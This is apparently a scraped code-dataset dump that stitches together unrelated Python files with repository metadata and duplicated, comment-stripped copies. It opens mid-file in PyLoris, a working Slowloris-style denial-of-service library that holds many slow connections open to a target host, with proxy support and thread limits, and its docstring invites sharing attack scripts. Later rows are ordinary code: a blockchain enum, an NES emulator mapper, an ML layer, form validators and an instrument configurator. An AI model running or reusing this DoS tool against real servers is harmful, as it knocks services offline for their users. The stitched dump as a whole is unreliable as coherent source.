Python 2.x versions. try: from ssl import wrap_socket except: wrap_socket = socket.ssl # Local modules import socks def DefaultOptions(): return { 'host' : 'localhost', # Host to attack 'port' : 80, # Port to connect to 'ssl' : False, # Use SSL connections 'attacklimit' : 500, # Total number of times to attack (0 for unlimited) 'connectionlimit' : 500, # Total number of concurrent connections (0 for unlimited) 'threadlimit' : 50, # Total number of threads (0 for unlimited) 'connectionspeed' : 1, # Connection speed in bytes/second 'timebetweenthreads' : 1, # Time delay between starting threads 'timebetweenconnections' : 1, # Time delay between starting connections 'quitimmediately' : False, # Close connections immediately after completing request 'socksversion' : '', # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP 'sockshost' : '', # SOCKS host 'socksport' : 0, # SOCKS port 'socksuser' : '', # SOCKS username 'sockspass' : '', # SOCKS password 'request' : '', # The main body of the attack } class Loris(threading.Thread): options = {} running = False attacks = 0 threads = 0 sockets = 0 def __init__(self): threading.Thread.__init__(self) self.connections = Queue.Queue() self.errors = Queue.Queue() self.messages = Queue.Queue() self.debug = Queue.Queue() self.options = DefaultOptions() def LoadOptions(self, o): self.options = o.copy() def run(self): self.messages.put('PyLoris is starting up.') self.running = True thread.start_new_thread(self.build_sockets, ()) for id in range(self.options['threadlimit']): thread.start_new_thread(self.attack, (id,)) self.threads += 1 if self.options['timebetweenthreads'] > 0: time.sleep(self.options['timebetweenthreads']) def build_sockets(self): self.debug.put('Socket Builder started.') count = 0 while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running: if self.options['connectionlimit'] > self.sockets: if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or self.options['socksversion'] == 'HTTP': if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4 elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5 else: proxytype = socks.PROXY_TYPE_HTTP s = socks.socksocket() if self.options['socksuser'] == '' and self.options['sockspass'] == '': s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass']) else: s.setproxy(proxytype, self.options['sockshost'], self.options['socksport']) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((self.options['host'], self.options['port'])) if self.options['ssl'] == True: wrap_socket(s) self.connections.put((s, 0)) self.debug.put('Socket opened, connection created.') self.attacks += 1 self.sockets += 1 except Exception, ex: self.errors.put('Could not connect. %s.' % (ex)) if self.options['timebetweenconnections'] > 0: time.sleep(self.options['timebetweenconnections']) self.debug.put('Socket Builder finished.') def attack(self, id): self.debug.put('Attack thread %i started' % (id)) while self.running: (s, index) = self.connections.get() try: if len(self.options['request']) > index: s.send(self.options['request'][index]) index += 1 self.connections.put((s, index)) elif self.options['quitimmediately'] == False: data = s.recv(1024) if not len(data): s.close() self.debug.put('Socket closed, data tranfer finished.') self.sockets -= 1 else: self.connections.put((s, index)) else: s.close() self.debug.put('Socket closed, not waiting for response.') self.sockets -= 1 except Exception, ex: self.errors.put(ex) self.debug.put('Socket closed, an exception occurred.') s.close() self.sockets -= 1 if self.sockets == 0 and self.attacks == self.options['attacklimit']: self.debug.put('Attack limit reached, all sockets closed. Shutting down.') self.running = False elif self.sockets > 0 and self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] / self.sockets * self.threads) elif self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] * self.threads) self.debug.put('Attack thread %i finished.' % (id)) self.threads -= 1 def status(self): return (self.attacks, self.threads, self.sockets) def stop(self): self.messages.put('PyLoris is shutting down.') self.running = False while not self.connections.empty(): try: s = self.connections.get(True, 30) s.close() self.sockets -= 1 except: pass class ScriptLoris(Loris): def __init__(self): self.options = DefaultOptions() Loris.__init__(self) def mainloop(self): self.start() time.sleep(1) while self.running: status = self.status() try: while True: message = self.messages.get(False) print('[MESSAGE] %s' %(message)) except: pass try: while True: debug = self.debug.get(False) print('[DEBUG] %s' %(debug)) except: pass try: while True: error = self.errors.get(False) print('[ERROR] %s' %(error)) except: pass print 'Loris has started %i attacks, with %i threads and %i connections currently running.' % status time.sleep(1) status = self.status() print 'Pyloris has completed %i attacks.' % (status[0])
en
0.851045
#!/usr/bin/env python libloris.py This is the main bulk of the PyLoris toolkit. This file contains: def DefaultOptions - The DefaultOptions function will populate a dict containing all the required options for running a basic PyLoris attack. class Loris - The Loris class is the hammer with which targets are struck. After instantiating this class, one must feed a dict containing connection options through the .LoadOptions member function. After the options are loaded, calling the .start member function will initiate the attack according to options specified. While an attack is underway, one may check the .status for a tuple of (# of total attacks started, # of attack threads, # of current open sockets). From there, you should call .messages.get, errors.get, and debug.get occasionally to gather additional information from PyLoris. See class ScriptLoris for a basic usage of the Loris class. class ScriptLoris - This is a base class for building attack scripts for rapid use or distribution. Simply instantiate a ScriptLoris object, the .options dict properties, and call .mainloop. Once you are satisfied with the results, pass the script along to your friends! # Base modules # Some import trickery to get SSL working across Python 2.x versions. # Local modules # Host to attack # Port to connect to # Use SSL connections # Total number of times to attack (0 for unlimited) # Total number of concurrent connections (0 for unlimited) # Total number of threads (0 for unlimited) # Connection speed in bytes/second # Time delay between starting threads # Time delay between starting connections # Close connections immediately after completing request # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP # SOCKS host # SOCKS port # SOCKS username # SOCKS password # The main body of the attack
2.785759
3
libra/transaction/transaction_payload.py
MaslDi/libra-client
0
6618631
from canoser import RustEnum from libra.transaction.program import Program from libra.transaction.write_set import WriteSet from libra.transaction.script import Script from libra.transaction.module import Module class TransactionPayload(RustEnum): _enums = [ ('Program', Program), ('WriteSet', WriteSet), ('Script', Script), ('Module', Module) ]
from canoser import RustEnum from libra.transaction.program import Program from libra.transaction.write_set import WriteSet from libra.transaction.script import Script from libra.transaction.module import Module class TransactionPayload(RustEnum): _enums = [ ('Program', Program), ('WriteSet', WriteSet), ('Script', Script), ('Module', Module) ]
none
1
1.802787
2
guanabara/Exercicios/mundo 3 _ aulas 16 a 23/085.py
pbittencourt/datasciencestudies
0
6618632
# SETE VALORES, PARES OU ÍMPARES """O usuário digita 7 valores numéricos e cadastra-os numa lista única, que mantem separados valores pares e ímpares. Ao final, mostra os valores pares e ímpares em ordem crescente.""" numeros = [] # matriz para armazenar todos os valores temp = [] # lista temporária para armazenar a cada iteração for i in range(1, 8): n = int(input(f'Digite o {i}º valor: _ ')) # resto da divisão entre n e 2 # 0: n par # 1: n ímpar r = n % 2 # armazena em "temp" os valores: # [resto, número] temp.append(r) temp.append(n) # copia "temp" para "numeros" numeros.append(temp[:]) # limpa a lista temp p/ a próxima iteração temp.clear() pares = [] # lista p/ armazenar os valores pares impares = [] # lista p/ armazenar os valores ímpares for num in numeros: # se o primeiro índice é igual a 0, o número é par if num[0] == 0: # adiciona o valor à lista dos pares pares.append(num[1]) # se o primeiro índice é igual a 1, o número é ímpar else: # adiciona o valor à lista dos ímpares impares.append(num[1]) print(f'Os valores pares digitados foram: {sorted(pares)}.') print(f'Os valores ímpares digitados foram: {sorted(impares)}.')
# SETE VALORES, PARES OU ÍMPARES """O usuário digita 7 valores numéricos e cadastra-os numa lista única, que mantem separados valores pares e ímpares. Ao final, mostra os valores pares e ímpares em ordem crescente.""" numeros = [] # matriz para armazenar todos os valores temp = [] # lista temporária para armazenar a cada iteração for i in range(1, 8): n = int(input(f'Digite o {i}º valor: _ ')) # resto da divisão entre n e 2 # 0: n par # 1: n ímpar r = n % 2 # armazena em "temp" os valores: # [resto, número] temp.append(r) temp.append(n) # copia "temp" para "numeros" numeros.append(temp[:]) # limpa a lista temp p/ a próxima iteração temp.clear() pares = [] # lista p/ armazenar os valores pares impares = [] # lista p/ armazenar os valores ímpares for num in numeros: # se o primeiro índice é igual a 0, o número é par if num[0] == 0: # adiciona o valor à lista dos pares pares.append(num[1]) # se o primeiro índice é igual a 1, o número é ímpar else: # adiciona o valor à lista dos ímpares impares.append(num[1]) print(f'Os valores pares digitados foram: {sorted(pares)}.') print(f'Os valores ímpares digitados foram: {sorted(impares)}.')
pt
0.750341
# SETE VALORES, PARES OU ÍMPARES O usuário digita 7 valores numéricos e cadastra-os numa lista única, que mantem separados valores pares e ímpares. Ao final, mostra os valores pares e ímpares em ordem crescente. # matriz para armazenar todos os valores # lista temporária para armazenar a cada iteração # resto da divisão entre n e 2 # 0: n par # 1: n ímpar # armazena em "temp" os valores: # [resto, número] # copia "temp" para "numeros" # limpa a lista temp p/ a próxima iteração # lista p/ armazenar os valores pares # lista p/ armazenar os valores ímpares # se o primeiro índice é igual a 0, o número é par # adiciona o valor à lista dos pares # se o primeiro índice é igual a 1, o número é ímpar # adiciona o valor à lista dos ímpares
4.246953
4
nes/bus/devices/cartridge/cartridges/nrom.py
Hexadorsimal/pynes
1
6618633
<gh_stars>1-10 from nes.bus.devices.memory import PrgRom, ChrRom from ..cartridge import Cartridge class NromCartridge(Cartridge): def __init__(self, rom_file): super().__init__(rom_file) self.prg_rom_pages = [] self.chr_rom_pages = [] for prg_rom_page in rom_file.prg_rom_pages: self.prg_rom_pages.append(PrgRom(prg_rom_page)) for chr_rom_page in rom_file.chr_rom_pages: self.chr_rom_pages.append(ChrRom(chr_rom_page)) if len(self.prg_rom_pages) == 1: self.buses['cpu'].attach_device('PRG0', self.prg_rom_pages[0], addr=self.PRG0_START, size=self.PRG_SIZE) self.buses['cpu'].attach_device('PRG0 Mirror', self.prg_rom_pages[0], addr=self.PRG1_START, size=self.PRG_SIZE) else: self.buses['cpu'].attach_device('PRG0', self.prg_rom_pages[0], addr=self.PRG0_START, size=self.PRG_SIZE) self.buses['cpu'].attach_device('PRG1', self.prg_rom_pages[1], addr=self.PRG1_START, size=self.PRG_SIZE) if self.chr_rom_pages: self.buses['ppu'].attach_device('CHR0', self.chr_rom_pages[0], addr=self.CHR0_START, size=self.CHR_SIZE) def __repr__(self): return self.name @property def name(self): return 'NROM Cartridge'
from nes.bus.devices.memory import PrgRom, ChrRom from ..cartridge import Cartridge class NromCartridge(Cartridge): def __init__(self, rom_file): super().__init__(rom_file) self.prg_rom_pages = [] self.chr_rom_pages = [] for prg_rom_page in rom_file.prg_rom_pages: self.prg_rom_pages.append(PrgRom(prg_rom_page)) for chr_rom_page in rom_file.chr_rom_pages: self.chr_rom_pages.append(ChrRom(chr_rom_page)) if len(self.prg_rom_pages) == 1: self.buses['cpu'].attach_device('PRG0', self.prg_rom_pages[0], addr=self.PRG0_START, size=self.PRG_SIZE) self.buses['cpu'].attach_device('PRG0 Mirror', self.prg_rom_pages[0], addr=self.PRG1_START, size=self.PRG_SIZE) else: self.buses['cpu'].attach_device('PRG0', self.prg_rom_pages[0], addr=self.PRG0_START, size=self.PRG_SIZE) self.buses['cpu'].attach_device('PRG1', self.prg_rom_pages[1], addr=self.PRG1_START, size=self.PRG_SIZE) if self.chr_rom_pages: self.buses['ppu'].attach_device('CHR0', self.chr_rom_pages[0], addr=self.CHR0_START, size=self.CHR_SIZE) def __repr__(self): return self.name @property def name(self): return 'NROM Cartridge'
none
1
2.31175
2
tests/web_platform/css_grid_1/grid_model/test_grid_inline_multicol.py
fletchgraham/colosseum
0
6618634
from tests.utils import W3CTestCase class TestGridInlineMulticol(W3CTestCase): vars().update(W3CTestCase.find_tests(__file__, 'grid-inline-multicol-'))
from tests.utils import W3CTestCase class TestGridInlineMulticol(W3CTestCase): vars().update(W3CTestCase.find_tests(__file__, 'grid-inline-multicol-'))
none
1
1.342091
1
src/mobilecontrol.py
ncatlin/lockwatcher
22
6618635
""" mobilecontrol.py @author: <NAME> This is a python script to be run on QPython on Android A remote control program which communicates with the designated computer using authenticated email Upload to your Qpython app using http://qpython.com/create.php """ import androidhelper import hashlib,time import hmac import binascii import email import smtplib secret = 'secret!' #use time+command+secret to generate HMAC def genCode(command): timenow = time.strftime('%d%m%Y%H%M') secretCat = 'secret!'+str(command) ourHash = hmac.new(bytes(secretCat),bytes(timenow),hashlib.sha1) code= ourHash.hexdigest() code = ''.join([code[x].lower() for x in range(1,20,2)]) return code droid = androidhelper.Android() message = "\ \n\ \t 1 -> Lock computer\n\ \t 2 -> Start Motion Monitor\n\ \t 3 -> Stop Motion Monitor\n\ \t 4 -> Standard Shutdown\n\ \t 5 -> Antiforensic Shutdown\n\ Enter Numeric Command" droid.dialogCreateInput("Remote System Control", message, None, "number") droid.dialogSetPositiveButtonText("Send") droid.dialogShow() command = droid.dialogGetResponse().result['value'] #email account login details HOST = 'CHANGEME' USERNAME = 'CHANGEME' PASSWORD = '<PASSWORD>' #myphone@domain - the 'alert sender address' field in lockwatcher FROM_ADDR = 'CHANGEME' #the address of the imap account monitored by lockwatcher TO_ADDR = 'CHANGEME' s = smtplib.SMTP(HOST) s.login(USERNAME, PASSWORD) msg = email.mime.Text.MIMEText('') msg['Subject'] = str(command)+' '+genCode(command) msg['From'] = FROM_ADDR msg['To'] = TO_ADDR s.sendmail(msg['From'],msg['To'], msg.as_string()) droid.makeToast("Command send: check email for reply.")
""" mobilecontrol.py @author: <NAME> This is a python script to be run on QPython on Android A remote control program which communicates with the designated computer using authenticated email Upload to your Qpython app using http://qpython.com/create.php """ import androidhelper import hashlib,time import hmac import binascii import email import smtplib secret = 'secret!' #use time+command+secret to generate HMAC def genCode(command): timenow = time.strftime('%d%m%Y%H%M') secretCat = 'secret!'+str(command) ourHash = hmac.new(bytes(secretCat),bytes(timenow),hashlib.sha1) code= ourHash.hexdigest() code = ''.join([code[x].lower() for x in range(1,20,2)]) return code droid = androidhelper.Android() message = "\ \n\ \t 1 -> Lock computer\n\ \t 2 -> Start Motion Monitor\n\ \t 3 -> Stop Motion Monitor\n\ \t 4 -> Standard Shutdown\n\ \t 5 -> Antiforensic Shutdown\n\ Enter Numeric Command" droid.dialogCreateInput("Remote System Control", message, None, "number") droid.dialogSetPositiveButtonText("Send") droid.dialogShow() command = droid.dialogGetResponse().result['value'] #email account login details HOST = 'CHANGEME' USERNAME = 'CHANGEME' PASSWORD = '<PASSWORD>' #myphone@domain - the 'alert sender address' field in lockwatcher FROM_ADDR = 'CHANGEME' #the address of the imap account monitored by lockwatcher TO_ADDR = 'CHANGEME' s = smtplib.SMTP(HOST) s.login(USERNAME, PASSWORD) msg = email.mime.Text.MIMEText('') msg['Subject'] = str(command)+' '+genCode(command) msg['From'] = FROM_ADDR msg['To'] = TO_ADDR s.sendmail(msg['From'],msg['To'], msg.as_string()) droid.makeToast("Command send: check email for reply.")
en
0.814733
mobilecontrol.py @author: <NAME> This is a python script to be run on QPython on Android A remote control program which communicates with the designated computer using authenticated email Upload to your Qpython app using http://qpython.com/create.php #use time+command+secret to generate HMAC #email account login details #myphone@domain - the 'alert sender address' field in lockwatcher #the address of the imap account monitored by lockwatcher
2.872014
3
plugins/usd/maya/publish/validata_rig_skelRoot_attr.py
davidlatwe/reveries-config
3
6618636
import pyblish.api class ValidateRigSkelRootAttribute(pyblish.api.InstancePlugin): """Check USD "USD_typeName" attribute exists. """ label = "Validate Rig SkelRoot Attribute" order = pyblish.api.ValidatorOrder + 0.132 hosts = ["maya"] families = ["reveries.rig.skeleton"] def process(self, instance): import maya.cmds as cmds skel_root = r'|ROOT|Group' if not cmds.objExists(skel_root): raise Exception(r'"|ROOT|Group" not exists.') # Check 'USD_typeName' attribute exists if not cmds.attributeQuery('USD_typeName', node=skel_root, ex=True): cmds.addAttr(skel_root, longName='USD_typeName', dt='string') cmds.setAttr( '{}.USD_typeName'.format(skel_root), 'SkelRoot', type='string')
import pyblish.api class ValidateRigSkelRootAttribute(pyblish.api.InstancePlugin): """Check USD "USD_typeName" attribute exists. """ label = "Validate Rig SkelRoot Attribute" order = pyblish.api.ValidatorOrder + 0.132 hosts = ["maya"] families = ["reveries.rig.skeleton"] def process(self, instance): import maya.cmds as cmds skel_root = r'|ROOT|Group' if not cmds.objExists(skel_root): raise Exception(r'"|ROOT|Group" not exists.') # Check 'USD_typeName' attribute exists if not cmds.attributeQuery('USD_typeName', node=skel_root, ex=True): cmds.addAttr(skel_root, longName='USD_typeName', dt='string') cmds.setAttr( '{}.USD_typeName'.format(skel_root), 'SkelRoot', type='string')
en
0.205617
Check USD "USD_typeName" attribute exists. # Check 'USD_typeName' attribute exists
2.23236
2
paragen/modules/encoders/layers/abstract_encoder_layer.py
godweiyang/ParaGen
50
6618637
<reponame>godweiyang/ParaGen import torch.nn as nn class AbstractEncoderLayer(nn.Module): """ AbstractEncoderLayer is an abstract class for encoder layers. """ def __init__(self): super().__init__() self._cache = {} self._mode = 'train' def reset(self, mode): """ Reset encoder layer and switch running mode Args: mode: running mode in [train, valid, infer] """ self._mode = mode self._cache.clear() def _update_cache(self, *args, **kwargs): """ Update internal cache from outside states """ pass def get_cache(self): """ Retrieve inner cache Returns: - cached states as a Dict """ return self._cache def set_cache(self, cache): """ Set cache from outside Args: cache: cache dict from outside """ self._cache = cache
import torch.nn as nn class AbstractEncoderLayer(nn.Module): """ AbstractEncoderLayer is an abstract class for encoder layers. """ def __init__(self): super().__init__() self._cache = {} self._mode = 'train' def reset(self, mode): """ Reset encoder layer and switch running mode Args: mode: running mode in [train, valid, infer] """ self._mode = mode self._cache.clear() def _update_cache(self, *args, **kwargs): """ Update internal cache from outside states """ pass def get_cache(self): """ Retrieve inner cache Returns: - cached states as a Dict """ return self._cache def set_cache(self, cache): """ Set cache from outside Args: cache: cache dict from outside """ self._cache = cache
en
0.774122
AbstractEncoderLayer is an abstract class for encoder layers. Reset encoder layer and switch running mode Args: mode: running mode in [train, valid, infer] Update internal cache from outside states Retrieve inner cache Returns: - cached states as a Dict Set cache from outside Args: cache: cache dict from outside
3.07261
3
app/gbi_server/forms/validator.py
omniscale/gbi-server
2
6618638
<gh_stars>1-10 # This file is part of the GBI project. # Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from wtforms.validators import ValidationError from flask.ext.babel import lazy_gettext as _l from gbi_server.model import User def username_unique(form, field): if User.by_email(field.data): raise ValidationError(_l('email already exists.')) def username_exists(form, field): if not User.by_email(field.data): raise ValidationError(_l('email does not exist.')) def check_password_length(form, field): if len(field.data) < 5: raise ValidationError(_l('Password must at least 6 characters'))
# This file is part of the GBI project. # Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from wtforms.validators import ValidationError from flask.ext.babel import lazy_gettext as _l from gbi_server.model import User def username_unique(form, field): if User.by_email(field.data): raise ValidationError(_l('email already exists.')) def username_exists(form, field): if not User.by_email(field.data): raise ValidationError(_l('email does not exist.')) def check_password_length(form, field): if len(field.data) < 5: raise ValidationError(_l('Password must at least 6 characters'))
en
0.839729
# This file is part of the GBI project. # Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
2.111459
2
dragonphy/cdr.py
StanfordVLSI/dragonphy2
22
6618639
<gh_stars>10-100 import numpy as np from dragonphy import Channel, DelayChannel, StaticQuantizer from dragonphy.channel import calculate_channel_loss import matplotlib.pyplot as plt class Cdr: def __init__(self, cdr_type='sign_mm'): self.cdr_timing_error[cdr_type](self) def cal_mm_timing_error(self, data): sign_data = np.where(data > 0, 1, -1) timing_errors = np.multiply(sign_data[2:] - sign_data[:-2], data[1:-1]) return timing_errors def cal_perfect_mm_timing_error(self, data, bits): timing_errors = np.multiply(bits[2:] - bits[:-2], data[1:-1]) return timing_errors def set_mm_timing_error(self): self.calculate_timing_error = self.cal_mm_timing_error def set_pmm_timing_error(self): self.calculate_timing_error = self.cal_perfect_mm_timing_error cdr_timing_error = { 'sign_mm' : set_mm_timing_error, 'perf_mm' : set_pmm_timing_error} if __name__ == "__main__": initial_timing = 5.8e-9 current_timing = 0 response_depth = 256 num_iterations = 50000 adc_bits = 16 cdr_bits = 16 cdr = Cdr() adc = StaticQuantizer(width=adc_bits, full_scale=1.0) chan = DelayChannel( channel_type='arctan', sampl_rate=1e9, resp_depth=response_depth, tau=3e-9, t_delay=initial_timing ) time, pulse_resp = chan.get_pulse_resp() plt.plot(time, pulse_resp) plt.stem(time, adc(pulse_resp)/(2**(adc_bits-1.0)), use_line_collection=True, linefmt='r-') plt.show() for ii in range(10): chan.adjust_delay(initial_timing + 0.05e-9 * ii) time, pulse_resp = chan.get_pulse_resp(t_delay=initial_timing + 0.05e-9 * ii) plt.stem(time, pulse_resp, use_line_collection=True) print(time[0:5]) plt.show() timing_history = np.zeros((num_iterations,1)) adjust_history = np.zeros((num_iterations,1)) error_history = np.zeros((num_iterations,1)) mean_history = np.zeros((num_iterations,1)) for ii in range(num_iterations): data = np.random.randint(2, size=(256,))*2-1 code = adc(chan.compute_output(data))[:-response_depth+2]*1.0 cdr_estimate = cdr.calculate_timing_error(code) int_and_dump = np.sum(cdr_estimate) / (2**(adc_bits-1)) * 0.5 current_timing -= int_and_dump mean_history[ii] = np.sum(code) / 16.0 timing_history[ii] = int(current_timing)*0.8e-12 adjust_history[ii] = int_and_dump chan.adjust_delay(initial_timing + int(current_timing)*0.8e-12) __, pulse_resp = chan.get_pulse_resp() cursor_position = np.where(pulse_resp == np.amax(pulse_resp))[0] error_history[ii] = (pulse_resp[cursor_position+1] - pulse_resp[cursor_position-1])/(pulse_resp[cursor_position]) plt.plot(timing_history/0.8e-12) plt.show() plt.plot(20*np.log10(np.abs(adjust_history))) #plt.plot(error_history ) #plt.show() plt.plot(20*np.log10(np.abs(error_history))) plt.show() #plt.plot(adjust_history/np.max(np.abs(adjust_history))) #plt.plot(mean_history/np.max(np.abs(mean_history))) #plt.show() time, pulse_resp = chan.get_pulse_resp() plt.plot(time, pulse_resp) plt.show()
import numpy as np from dragonphy import Channel, DelayChannel, StaticQuantizer from dragonphy.channel import calculate_channel_loss import matplotlib.pyplot as plt class Cdr: def __init__(self, cdr_type='sign_mm'): self.cdr_timing_error[cdr_type](self) def cal_mm_timing_error(self, data): sign_data = np.where(data > 0, 1, -1) timing_errors = np.multiply(sign_data[2:] - sign_data[:-2], data[1:-1]) return timing_errors def cal_perfect_mm_timing_error(self, data, bits): timing_errors = np.multiply(bits[2:] - bits[:-2], data[1:-1]) return timing_errors def set_mm_timing_error(self): self.calculate_timing_error = self.cal_mm_timing_error def set_pmm_timing_error(self): self.calculate_timing_error = self.cal_perfect_mm_timing_error cdr_timing_error = { 'sign_mm' : set_mm_timing_error, 'perf_mm' : set_pmm_timing_error} if __name__ == "__main__": initial_timing = 5.8e-9 current_timing = 0 response_depth = 256 num_iterations = 50000 adc_bits = 16 cdr_bits = 16 cdr = Cdr() adc = StaticQuantizer(width=adc_bits, full_scale=1.0) chan = DelayChannel( channel_type='arctan', sampl_rate=1e9, resp_depth=response_depth, tau=3e-9, t_delay=initial_timing ) time, pulse_resp = chan.get_pulse_resp() plt.plot(time, pulse_resp) plt.stem(time, adc(pulse_resp)/(2**(adc_bits-1.0)), use_line_collection=True, linefmt='r-') plt.show() for ii in range(10): chan.adjust_delay(initial_timing + 0.05e-9 * ii) time, pulse_resp = chan.get_pulse_resp(t_delay=initial_timing + 0.05e-9 * ii) plt.stem(time, pulse_resp, use_line_collection=True) print(time[0:5]) plt.show() timing_history = np.zeros((num_iterations,1)) adjust_history = np.zeros((num_iterations,1)) error_history = np.zeros((num_iterations,1)) mean_history = np.zeros((num_iterations,1)) for ii in range(num_iterations): data = np.random.randint(2, size=(256,))*2-1 code = adc(chan.compute_output(data))[:-response_depth+2]*1.0 cdr_estimate = cdr.calculate_timing_error(code) int_and_dump = np.sum(cdr_estimate) / (2**(adc_bits-1)) * 0.5 current_timing -= int_and_dump mean_history[ii] = np.sum(code) / 16.0 timing_history[ii] = int(current_timing)*0.8e-12 adjust_history[ii] = int_and_dump chan.adjust_delay(initial_timing + int(current_timing)*0.8e-12) __, pulse_resp = chan.get_pulse_resp() cursor_position = np.where(pulse_resp == np.amax(pulse_resp))[0] error_history[ii] = (pulse_resp[cursor_position+1] - pulse_resp[cursor_position-1])/(pulse_resp[cursor_position]) plt.plot(timing_history/0.8e-12) plt.show() plt.plot(20*np.log10(np.abs(adjust_history))) #plt.plot(error_history ) #plt.show() plt.plot(20*np.log10(np.abs(error_history))) plt.show() #plt.plot(adjust_history/np.max(np.abs(adjust_history))) #plt.plot(mean_history/np.max(np.abs(mean_history))) #plt.show() time, pulse_resp = chan.get_pulse_resp() plt.plot(time, pulse_resp) plt.show()
en
0.140725
#plt.plot(error_history ) #plt.show() #plt.plot(adjust_history/np.max(np.abs(adjust_history))) #plt.plot(mean_history/np.max(np.abs(mean_history))) #plt.show()
2.476067
2
src/pycaenhv/config/configurator.py
vasoto/pycaenhv
0
6618640
import logging from typing import Dict, Any, Optional, Union from ..context import HVContext from ..helpers import get_channel_parameter, check_channel_parameter_value from ..wrappers import set_channel_parameter, get_crate_map from .enitites import HVBase, Channel logger = logging.getLogger(__name__) class ChannelConfigurator: def __init__(self, config: HVBase) -> None: self.config = config self.context: Union[HVContext, None] = None self._channels_count: Union[int, None] = None self.crate_map: Union[Dict[str, Any], None] = None def initialize(self): logger.info("Initialize configurator") arg = self.config.address logger.debug("Board=%s Link=%s Argument=%s", self.config.board, self.config.link.name, str(arg)) self.context = HVContext(system=self.config.board, link=self.config.link.name, argument=arg) self.context.start() self.crate_map = get_crate_map(self.context.handle) logger.debug("Configurator initialized. Found %d channels", self.crate_map['channels'][self.config.slot]) def finish(self): self.context.close() logger.info("Configurator finished") @property def channels_count(self) -> int: """ Get the number of channels in the module """ if self.crate_map is None: self.initialize() return self.crate_map['channels'][self.config.slot] def _set_param(self, channel: int, parameter: str, value: Any) -> None: current_state = get_channel_parameter(self.context.handle, self.config.slot, channel, "Pw") if value != current_state: if not check_channel_parameter_value( self.context.handle, self.config.slot, channel, parameter, value): msg = f"Value for parameter {parameter} ({value}) is out of the allowed range." logger.error(msg) raise ValueError(msg) set_channel_parameter(self.context.handle, self.config.slot, channel, parameter, value) logger.debug("Parameter %s for channel %d set to %s", parameter, channel, str(value)) else: logger.debug( "Channel %d parameter %s already set to %s. Skipping...", channel, parameter, str(value)) def _apply_config(self, channel: int, config: Channel) -> None: """ Apply channel configuration """ logger.debug("Applying configuration") parameters = config.dict(exclude_none=True) # Exclude unset fields for param, value in parameters.items(): self._set_param(channel=channel, parameter=param, value=value) def configure(self): if self.context is None: raise ValueError("Context is not set, please initialize") channels_config = self.config.channels defaults = channels_config.default or {} configs = channels_config.channels or {} for channel in range(self.channels_count): conf = configs.get(channel, defaults) self._apply_config(channel, conf) def _switch_channel(self, channel: int, switch: bool): _switch = int(switch) self._set_param(channel, "Pw", _switch) def switch(self, value: bool): logger.info("Switch channels %s", {True: "ON", False: "OFF"}[value]) for channel in range(self.channels_count): self._switch_channel(channel=channel, switch=value)
import logging from typing import Dict, Any, Optional, Union from ..context import HVContext from ..helpers import get_channel_parameter, check_channel_parameter_value from ..wrappers import set_channel_parameter, get_crate_map from .enitites import HVBase, Channel logger = logging.getLogger(__name__) class ChannelConfigurator: def __init__(self, config: HVBase) -> None: self.config = config self.context: Union[HVContext, None] = None self._channels_count: Union[int, None] = None self.crate_map: Union[Dict[str, Any], None] = None def initialize(self): logger.info("Initialize configurator") arg = self.config.address logger.debug("Board=%s Link=%s Argument=%s", self.config.board, self.config.link.name, str(arg)) self.context = HVContext(system=self.config.board, link=self.config.link.name, argument=arg) self.context.start() self.crate_map = get_crate_map(self.context.handle) logger.debug("Configurator initialized. Found %d channels", self.crate_map['channels'][self.config.slot]) def finish(self): self.context.close() logger.info("Configurator finished") @property def channels_count(self) -> int: """ Get the number of channels in the module """ if self.crate_map is None: self.initialize() return self.crate_map['channels'][self.config.slot] def _set_param(self, channel: int, parameter: str, value: Any) -> None: current_state = get_channel_parameter(self.context.handle, self.config.slot, channel, "Pw") if value != current_state: if not check_channel_parameter_value( self.context.handle, self.config.slot, channel, parameter, value): msg = f"Value for parameter {parameter} ({value}) is out of the allowed range." logger.error(msg) raise ValueError(msg) set_channel_parameter(self.context.handle, self.config.slot, channel, parameter, value) logger.debug("Parameter %s for channel %d set to %s", parameter, channel, str(value)) else: logger.debug( "Channel %d parameter %s already set to %s. Skipping...", channel, parameter, str(value)) def _apply_config(self, channel: int, config: Channel) -> None: """ Apply channel configuration """ logger.debug("Applying configuration") parameters = config.dict(exclude_none=True) # Exclude unset fields for param, value in parameters.items(): self._set_param(channel=channel, parameter=param, value=value) def configure(self): if self.context is None: raise ValueError("Context is not set, please initialize") channels_config = self.config.channels defaults = channels_config.default or {} configs = channels_config.channels or {} for channel in range(self.channels_count): conf = configs.get(channel, defaults) self._apply_config(channel, conf) def _switch_channel(self, channel: int, switch: bool): _switch = int(switch) self._set_param(channel, "Pw", _switch) def switch(self, value: bool): logger.info("Switch channels 